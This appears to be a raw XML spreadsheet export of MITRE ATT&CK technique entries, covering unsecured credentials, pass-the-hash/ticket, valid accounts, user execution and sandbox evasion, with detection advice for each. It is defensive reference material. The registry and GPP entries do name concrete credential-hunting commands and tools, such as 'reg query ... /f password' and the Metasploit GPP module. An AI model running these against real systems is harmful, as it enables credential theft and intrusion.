    <t xml:space="preserve">Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.(Citation: Docker API)(Citation: Kubernetes API)
An adversary may access the Docker API to collect logs that contain credentials to cloud, container, and various other resources in the environment.(Citation: Unit 42 Unsecured Docker Daemons) An adversary with sufficient permissions, such as via a pod's service account, may also use the Kubernetes API to retrieve credentials from the Kubernetes API server. These credentials may include those needed for Docker API authentication or secrets from Kubernetes cluster components. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/007</t>
  </si>
  <si>
    <t>Establish centralized logging for the activity of container and Kubernetes cluster components. Monitor logs for actions that could be taken to gather credentials to container and cloud infrastructure, including the use of discovery API calls by new or unexpected users and APIs that access Docker logs.
It may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>Center for Threat-Informed Defense (CTID); Jay Chen, Palo Alto Networks; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1552.001</t>
  </si>
  <si>
    <t>Unsecured Credentials: Credentials In Files</t>
  </si>
  <si>
    <t>Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
It is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)
In cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/001</t>
  </si>
  <si>
    <t>While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.</t>
  </si>
  <si>
    <t>Jay Chen, Palo Alto Networks; Microsoft Threat Intelligence Center (MSTIC); Rory McCune, Aqua Security; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1552.002</t>
  </si>
  <si>
    <t>Unsecured Credentials: Credentials in Registry</t>
  </si>
  <si>
    <t>Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Example commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)
* Local Machine Hive: &lt;code&gt;reg query HKLM /f password /t REG_SZ /s&lt;/code&gt;
* Current User Hive: &lt;code&gt;reg query HKCU /f password /t REG_SZ /s&lt;/code&gt;</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/002</t>
  </si>
  <si>
    <t>Monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>T1552.006</t>
  </si>
  <si>
    <t>Unsecured Credentials: Group Policy Preferences</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
These group policies are stored in SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and decrypt the password (using the AES key that has been made public).(Citation: Microsoft GPP Key)
The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:
* Metasploit’s post exploitation module: &lt;code&gt;post/windows/gather/credentials/gpp&lt;/code&gt;
* Get-GPPPassword(Citation: Obscuresecurity Get-GPPPassword)
* gpprefdecrypt.py
On the SYSVOL share, adversaries may use the following command to enumerate potential GPP XML files: &lt;code&gt;dir /s * .xml&lt;/code&gt;
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/006</t>
  </si>
  <si>
    <t>Monitor for attempts to access SYSVOL that involve searching for XML files. 
Deploy a new XML file with permissions set to Everyone:Deny and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords in SYSVOL)</t>
  </si>
  <si>
    <t>T1552.004</t>
  </si>
  <si>
    <t>Unsecured Credentials: Private Keys</t>
  </si>
  <si>
    <t>Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. 
Adversaries may also look in common key directories, such as &lt;code&gt;~/.ssh&lt;/code&gt; for SSH keys on * nix-based systems or &lt;code&gt;C:&amp;#92;Users&amp;#92;(username)&amp;#92;.ssh&amp;#92;&lt;/code&gt; on Windows. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.
Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)
Some private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/004</t>
  </si>
  <si>
    <t>Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication.</t>
  </si>
  <si>
    <t>T1535</t>
  </si>
  <si>
    <t>Unused/Unsupported Cloud Regions</t>
  </si>
  <si>
    <t>Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.
Cloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.
A variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.
An example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://attack.mitre.org/techniques/T1496), which can cost organizations substantial amounts of money over time depending on the processing power used.(Citation: CloudSploit - Unused AWS Regions)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1535</t>
  </si>
  <si>
    <t>Monitor system logs to review activities occurring across all cloud environments and regions. Configure alerting to notify of activity in normally unused regions or if the number of instances active in a region goes above a certain threshold.(Citation: CloudSploit - Unused AWS Regions)</t>
  </si>
  <si>
    <t>T1550</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. 
Authentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.(Citation: NIST Authentication)(Citation: NIST MFA)
Caching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through [Credential Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1550</t>
  </si>
  <si>
    <t>Defense Evasion, Lateral Movement</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</si>
  <si>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t>
  </si>
  <si>
    <t>Google Workspace, Office 365, SaaS, Windows</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Credential Request, Application Log: Application Log Content, Logon Session: Logon Session Creation, User Account: User Account Authentication, Web Credential: Web Credential Usage</t>
  </si>
  <si>
    <t>System Access Controls</t>
  </si>
  <si>
    <t>T1550.001</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material: Application Access Token</t>
  </si>
  <si>
    <t>Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials.
Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)
For example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)
Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1550/001</t>
  </si>
  <si>
    <t>Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs.</t>
  </si>
  <si>
    <t>Google Workspace, Office 365, SaaS</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Web Credential: Web Credential Usage</t>
  </si>
  <si>
    <t>T1550.002</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material: Pass the Hash</t>
  </si>
  <si>
    <t>Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.
When performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.
Adversaries may also use stolen password hashes to "overpass the hash." Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.(Citation: Stealthbits Overpass-the-Hash)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1550/002</t>
  </si>
  <si>
    <t>Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious.
Event ID 4768 and 4769 will also be generated on the Domain Controller when a user requests a new ticket granting ticket or service ticket. These events combined with the above activity may be indicative of an overpass the hash attempt.(Citation: Stealthbits Overpass-the-Hash)</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Credential Request, Logon Session: Logon Session Creation, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>Blake Strom, Microsoft 365 Defender; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>T1550.003</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material: Pass the Ticket</t>
  </si>
  <si>
    <t>Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
When preforming PtT, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket)
A [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks)
A [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014)
Adversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, "overpassing the hash" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1550/003</t>
  </si>
  <si>
    <t>Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
Event ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to "Integrity check on decrypted field failed" and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection)</t>
  </si>
  <si>
    <t>Ryan Becwar; Vincent Le Toux</t>
  </si>
  <si>
    <t>T1550.004</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material: Web Session Cookie</t>
  </si>
  <si>
    <t>Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) or [Web Cookies](https://attack.mitre.org/techniques/T1606/001), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.
There have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1550/004</t>
  </si>
  <si>
    <t>Monitor for anomalous access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.</t>
  </si>
  <si>
    <t>Johann Rehberger</t>
  </si>
  <si>
    <t>T1204</t>
  </si>
  <si>
    <t>User Execution</t>
  </si>
  <si>
    <t>An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
While [User Execution](https://attack.mitre.org/techniques/T1204)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</si>
  <si>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</si>
  <si>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</si>
  <si>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Application Log: Application Log Content, Command: Command Execution, Container: Container Creation, Container: Container Start, File: File Creation, Image: Image Creation, Instance: Instance Creation, Instance: Instance Start, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Process: Process Creation</t>
  </si>
  <si>
    <t>Oleg Skulkin, Group-IB</t>
  </si>
  <si>
    <t>T1204.002</t>
  </si>
  <si>
    <t>User Execution: Malicious File</t>
  </si>
  <si>
    <t>An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.
Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) on the file to increase the likelihood that a user will open it.
While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1204/002</t>
  </si>
  <si>
    <t>Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain initial access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).</t>
  </si>
  <si>
    <t>File: File Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1204.003</t>
  </si>
  <si>
    <t>User Execution: Malicious Image</t>
  </si>
  <si>
    <t>Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
Adversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1204/003</t>
  </si>
  <si>
    <t>Monitor the local image registry to make sure malicious images are not added. Track the deployment of new containers, especially from newly built images. Monitor the behavior of containers within the environment to detect anomalous behavior or malicious activity after users deploy from malicious images.</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, Container: Container Creation, Container: Container Start, Image: Image Creation, Instance: Instance Creation, Instance: Instance Start</t>
  </si>
  <si>
    <t>Center for Threat-Informed Defense (CTID); Vishwas Manral, McAfee</t>
  </si>
  <si>
    <t>T1204.001</t>
  </si>
  <si>
    <t>User Execution: Malicious Link</t>
  </si>
  <si>
    <t>An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1204/001</t>
  </si>
  <si>
    <t>Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.</t>
  </si>
  <si>
    <t>File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>T1078</t>
  </si>
  <si>
    <t>Valid Accounts</t>
  </si>
  <si>
    <t>Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078</t>
  </si>
  <si>
    <t>Defense Evasion, Initial Access, Persistence, Privilege Escalation</t>
  </si>
  <si>
    <t>Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: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and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.</t>
  </si>
  <si>
    <t>Mark Wee; Netskope; Praetorian; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>Anti-virus, Application control, Firewall, Host intrusion prevention systems, Network intrusion detection system, System access controls</t>
  </si>
  <si>
    <t>T1078.004</t>
  </si>
  <si>
    <t>Valid Accounts: Cloud Accounts</t>
  </si>
  <si>
    <t>Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078/004</t>
  </si>
  <si>
    <t>Monitor the activity of cloud accounts to detect abnormal or malicious behavior, such as accessing information outside of the normal function of the account or account usage at atypical hours.</t>
  </si>
  <si>
    <t>T1078.001</t>
  </si>
  <si>
    <t>Valid Accounts: Default Accounts</t>
  </si>
  <si>
    <t>Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078/001</t>
  </si>
  <si>
    <t>05 April 2021</t>
  </si>
  <si>
    <t>Monitor whether default accounts have been activated or logged into. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.</t>
  </si>
  <si>
    <t>T1078.002</t>
  </si>
  <si>
    <t>Valid Accounts: Domain Accounts</t>
  </si>
  <si>
    <t>Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078/002</t>
  </si>
  <si>
    <t>Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence.</t>
  </si>
  <si>
    <t>T1078.003</t>
  </si>
  <si>
    <t>Valid Accounts: Local Accounts</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.
Local Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078/003</t>
  </si>
  <si>
    <t>Perform regular audits of local system accounts to detect accounts that may have been created by an adversary for persistence. Look for suspicious account behavior, such as accounts logged in at odd times or outside of business hours.</t>
  </si>
  <si>
    <t>T1125</t>
  </si>
  <si>
    <t>Video Capture</t>
  </si>
  <si>
    <t>An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen.
In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1125</t>
  </si>
  <si>
    <t>Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.
Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.</t>
  </si>
  <si>
    <t>T1497</t>
  </si>
  <si>
    <t>Virtualization/Sandbox Evasion</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may employ various means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use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015)
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1497</t>
  </si>
  <si>
    <t>Defense Evasion, Discovery</t>
  </si>
  <si>
    <t>Virtualization, sandbox, user activity, and related discovery techniques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</si>
  <si>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 Sunny Neo</t>
  </si>
  <si>
    <t>Anti-virus, Host forensic analysis, Signature-based detection, Static File Analysis</t>
  </si>
  <si>
    <t>T1497.001</t>
  </si>
  <si>
    <t>Virtualization/Sandbox Evasion: System Checks</t>
  </si>
  <si>
    <t>Adversaries may employ various system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Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks  into one script and then have the program exit if it determines the system to be a virtual environment. 
Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. 
Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. 
Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1497/001</t>
  </si>
  <si>
    <t>06 March 2020</t>
  </si>
  <si>
    <t>Virtualization/sandbox related system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t>
  </si>
  <si>
    <t>Deloitte Threat Library Team</t>
  </si>
  <si>
    <t>T1497.003</t>
  </si>
  <si>
    <t>Virtualization/Sandbox Evasion: Time Based Evasion</t>
  </si>
  <si>
    <t>Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
Adversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to avoid analysis and scrutiny.
